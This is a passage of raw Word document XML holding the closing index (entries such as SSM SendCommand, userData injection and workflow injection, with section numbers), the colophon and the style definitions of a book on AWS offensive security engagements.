        </w:rPr>
        <w:t>Service Control Policies (SCP)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> — 3.1, 7.1, 15.4. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>Session policies</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> — 7.1. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>Shared Responsibility Model</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> — 1.1. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>SNS resource policies</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> — 14.3. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>SourceIdentity</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> — 7.7, 16.3. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>SQS resource policies</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> — 14.3. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>SSM SendCommand</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> — 8.17, 10.4. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>SSM StartSession</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> — 10.3. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>Step Functions</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> — 14.4. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>Stratus Red Team</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> — 18.3. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>Supply-chain attacks</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> — 19. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C48FB47"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Terraform state manipulation</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> — 19.2. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>TruffleHog</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> — 18.2. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36DC9448"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UpdateAssumeRolePolicy</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> — 8.6. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>UpdateFunctionCode</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> — 8.13, 10.5. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>userData injection</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> — 8.20, app B. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47315E8E"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VPC Flow Logs</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> — 17.3. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>VPC peering</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> — 9.7. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C05439A" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>Workflow injection</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> — 19.4. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00FF58DF" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>Colophon</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F010208"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 xml:space="preserve">This book was composed as a single self-contained HTML document. Typography uses a conventional serif body (Georgia stack) and a monospace code face (Menlo / Consolas stack) throughout. Page size is approximately 7.25×9.25 inches when rendered to PDF via a standard browser's print-to-PDF path. Inline SVG is used for all figures so that the document has no external dependencies. Terminal blocks are styled approximations of xterm-color output; the actual tool output in any reader's environment will vary with </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>tool version and configuration.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44B7CE64" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>The material in this book reflects the authors' observations on AWS offensive engagements through mid-2026. AWS services evolve rapidly, and specific IAM actions, finding names, or default behaviours described here may have changed by the time a reader encounters them. Where a detail has operational consequences, verify against the current AWS documentation before acting on it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A759D54" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="center"/>
        <w:spacing w:before="480" w:after="132"/>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>— End of book —</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="000E7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592"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="697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61F1C"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="75A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1D24"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="3AEE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5550E"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="6C6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A1ED4"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="A6D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12BC2"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="E5DC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577CC"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="3CE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97542"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="8DE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37FA2"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="96B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07854"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="F63A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17D07"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="B82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F7140"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="D9BA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2C4427"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="79F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20C95"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="D03E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836DA"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="102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503D4"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="0B52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5664A"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="FDD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B7240"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="8E64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338BC"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="A24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B773F"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="F92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E2339"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="D89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5198A"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="0982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885AFC"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="67B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D7C00"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="C638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6D1F94"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="51B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26EE1"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="EB84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105D6F"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="6B6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90E6E"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="94E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11DE9"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="35F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F7D68"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="B69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813CC"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="651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65C8A"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="B4A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968EF"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="CDE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B3EB3"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="22FC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A78C5"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="D37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C455E"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="E4C8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B96D94"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="197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237FCB"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="BCAE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883755"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="F70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173BB"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="49E6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FC004A"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="7248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04446"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="FE52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D160D1"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="1AD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9732F"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="4EF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70FEA"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="80E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F3166"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="A75A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97508"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="269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34325E"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="147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56E06"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="49F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505A3"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="DCB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12EBF"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="343C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78271E"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="CAF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A6779"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="BAA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B70A42"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="5F6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1763A"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="E3D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F8135A"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="522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C6885"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="2BF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7B7E40"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="5E76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E01E18"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="B45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0060F1"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="73A8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3C293C"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="4CA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931556">
    <w:abstractNumId w:val="58"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="1506633577">
    <w:abstractNumId w:val="21"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="1918592517">
    <w:abstractNumId w:val="57"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="1402022921">
    <w:abstractNumId w:val="41"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="418019564">
    <w:abstractNumId w:val="12"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="1623532957">
    <w:abstractNumId w:val="46"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="1508205251">
    <w:abstractNumId w:val="23"/>
  </w:num>
  <w:num w:numId="8" w16cid:durableId="1000307583">
    <w:abstractNumId w:val="40"/>
  </w:num>
  <w:num w:numId="9" w16cid:durableId="292254731">
    <w:abstractNumId w:val="25"/>
  </w:num>
  <w:num w:numId="10" w16cid:durableId="13578957">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="11" w16cid:durableId="1966347239">
    <w:abstractNumId w:val="42"/>
  </w:num>
  <w:num w:numId="12" w16cid:durableId="391579764">
    <w:abstractNumId w:val="38"/>
  </w:num>
  <w:num w:numId="13" w16cid:durableId="2112702415">
    <w:abstractNumId w:val="19"/>
  </w:num>
  <w:num w:numId="14" w16cid:durableId="1917938790">
    <w:abstractNumId w:val="15"/>
  </w:num>
  <w:num w:numId="15" w16cid:durableId="59404221">
    <w:abstractNumId w:val="43"/>
  </w:num>
  <w:num w:numId="16" w16cid:durableId="1663658538">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="17" w16cid:durableId="747727846">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="18" w16cid:durableId="1788236544">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="19" w16cid:durableId="1053509109">
    <w:abstractNumId w:val="55"/>
  </w:num>
  <w:num w:numId="20" w16cid:durableId="755133343">
    <w:abstractNumId w:val="16"/>
  </w:num>
  <w:num w:numId="21" w16cid:durableId="834103135">
    <w:abstractNumId w:val="44"/>
  </w:num>
  <w:num w:numId="22" w16cid:durableId="1136412121">
    <w:abstractNumId w:val="51"/>
  </w:num>
  <w:num w:numId="23" w16cid:durableId="809791187">
    <w:abstractNumId w:val="49"/>
  </w:num>
  <w:num w:numId="24" w16cid:durableId="649482127">
    <w:abstractNumId w:val="50"/>
  </w:num>
  <w:num w:numId="25" w16cid:durableId="1725375138">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="26" w16cid:durableId="1580015677">
    <w:abstractNumId w:val="31"/>
  </w:num>
  <w:num w:numId="27" w16cid:durableId="1614894967">
    <w:abstractNumId w:val="11"/>
  </w:num>
  <w:num w:numId="28" w16cid:durableId="525337747">
    <w:abstractNumId w:val="28"/>
  </w:num>
  <w:num w:numId="29" w16cid:durableId="1050152281">
    <w:abstractNumId w:val="17"/>
  </w:num>
  <w:num w:numId="30" w16cid:durableId="2042775639">
    <w:abstractNumId w:val="59"/>
  </w:num>
  <w:num w:numId="31" w16cid:durableId="386496446">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="32" w16cid:durableId="84963342">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="33" w16cid:durableId="2065137036">
    <w:abstractNumId w:val="35"/>
  </w:num>
  <w:num w:numId="34" w16cid:durableId="4334463">
    <w:abstractNumId w:val="39"/>
  </w:num>
  <w:num w:numId="35" w16cid:durableId="1329213802">
    <w:abstractNumId w:val="24"/>
  </w:num>
  <w:num w:numId="36" w16cid:durableId="91054050">
    <w:abstractNumId w:val="53"/>
  </w:num>
  <w:num w:numId="37" w16cid:durableId="580723832">
    <w:abstractNumId w:val="20"/>
  </w:num>
  <w:num w:numId="38" w16cid:durableId="1986469457">
    <w:abstractNumId w:val="36"/>
  </w:num>
  <w:num w:numId="39" w16cid:durableId="103234132">
    <w:abstractNumId w:val="37"/>
  </w:num>
  <w:num w:numId="40" w16cid:durableId="842814772">
    <w:abstractNumId w:val="47"/>
  </w:num>
  <w:num w:numId="41" w16cid:durableId="167409342">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="42" w16cid:durableId="249853219">
    <w:abstractNumId w:val="18"/>
  </w:num>
  <w:num w:numId="43" w16cid:durableId="212497592">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="44" w16cid:durableId="1384913655">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="45" w16cid:durableId="128062435">
    <w:abstractNumId w:val="30"/>
  </w:num>
  <w:num w:numId="46" w16cid:durableId="300572990">
    <w:abstractNumId w:val="22"/>
  </w:num>
  <w:num w:numId="47" w16cid:durableId="1370572444">
    <w:abstractNumId w:val="52"/>
  </w:num>
  <w:num w:numId="48" w16cid:durableId="608437898">
    <w:abstractNumId w:val="32"/>
  </w:num>
  <w:num w:numId="49" w16cid:durableId="1124468468">
    <w:abstractNumId w:val="14"/>
  </w:num>
  <w:num w:numId="50" w16cid:durableId="627667925">
    <w:abstractNumId w:val="60"/>
  </w:num>
  <w:num w:numId="51" w16cid:durableId="776825195">
    <w:abstractNumId w:val="27"/>
  </w:num>
  <w:num w:numId="52" w16cid:durableId="928584973">
    <w:abstractNumId w:val="26"/>
  </w:num>
  <w:num w:numId="53" w16cid:durableId="125464830">
    <w:abstractNumId w:val="13"/>
  </w:num>
  <w:num w:numId="54" w16cid:durableId="1285429197">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="55" w16cid:durableId="1300651677">
    <w:abstractNumId w:val="56"/>
  </w:num>
  <w:num w:numId="56" w16cid:durableId="924801440">
    <w:abstractNumId w:val="48"/>
  </w:num>
  <w:num w:numId="57" w16cid:durableId="576482846">
    <w:abstractNumId w:val="54"/>
  </w:num>
  <w:num w:numId="58" w16cid:durableId="92629935">
    <w:abstractNumId w:val="34"/>
  </w:num>
  <w:num w:numId="59" w16cid:durableId="11955421">
    <w:abstractNumId w:val="45"/>
  </w:num>
  <w:num w:numId="60" w16cid:durableId="1648779074">
    <w:abstractNumId w:val="33"/>
  </w:num>
  <w:num w:numId="61" w16cid:durableId="8744680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71C"/>
    <w:rsid w:val="000E759F"/>
    <w:rsid w:val="00400D6D"/>
    <w:rsid w:val="00E24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7779D"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{F7AC60CF-AC18-46E0-95B2-E3B0DBC2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84" w:after="96"/>
      <w:outlineLvl w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Source Sans Pro" w:hAnsi="Source Sans Pro"/>
      <w:b/>
      <w:bCs/>
      <w:kern w:val="36"/>
      <w:sz w:val="48"/>
      <w:szCs w:val="48"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading2">
    <w:name w:val="heading 2"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="Heading2Char"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:pPr>
      <w:spacing w:before="384" w:after="96"/>
      <w:outlineLvl w:val="1"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Source Sans Pro" w:hAnsi="Source Sans Pro"/>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading3">
    <w:name w:val="heading 3"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="Heading3Char"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:pPr>
      <w:spacing w:before="384" w:after="96"/>
      <w:outlineLvl w:val="2"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Source Sans Pro" w:hAnsi="Source Sans Pro"/>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading4">
    <w:name w:val="heading 4"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="Heading4Char"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:pPr>
      <w:spacing w:before="384" w:after="96"/>
      <w:outlineLvl w:val="3"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Source Sans Pro" w:hAnsi="Source Sans Pro"/>
      <w:b/>
      <w:bCs/>
      <w:caps/>
      <w:spacing w:val="1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Source Code Pro" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Source Code Pro" w:cs="Courier New" w:hint="default"/>
      <w:color w:val="111111"/>
      <w:sz w:val="22"/>
      <w:szCs w:val="22"/>
      <w:shd w:val="clear" w:color="auto" w:fill="EEF1F4"/>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HTMLKeyboard">
    <w:name w:val="HTML Keyboard"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rPr>
      <w:rFonts w:ascii="Source Code Pro" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Source Code Pro" w:cs="Courier New" w:hint="default"/>
      <w:color w:val="111111"/>
      <w:sz w:val="22"/>
      <w:szCs w:val="22"/>
      <w:shd w:val="clear" w:color="auto" w:fill="EEF1F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Source Code Pro" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Source Code Pro" w:cs="Courier New" w:hint="default"/>
      <w:color w:val="111111"/>
      <w:sz w:val="22"/>
      <w:szCs w:val="22"/>
      <w:shd w:val="clear" w:color="auto" w:fill="EEF1F4"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Strong">
    <w:name w:val="Strong"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="22"/>
    <w:qFormat/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="msonormal0">
    <w:name w:val="msonormal"/>
    <w:basedOn w:val="Normal"/>
    <w:pPr>
      <w:spacing w:before="132" w:after="132"/>
      <w:jc w:val="both"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="NormalWeb">
    <w:name w:val="Normal (Web)"/>
    <w:basedOn w:val="Normal"/>
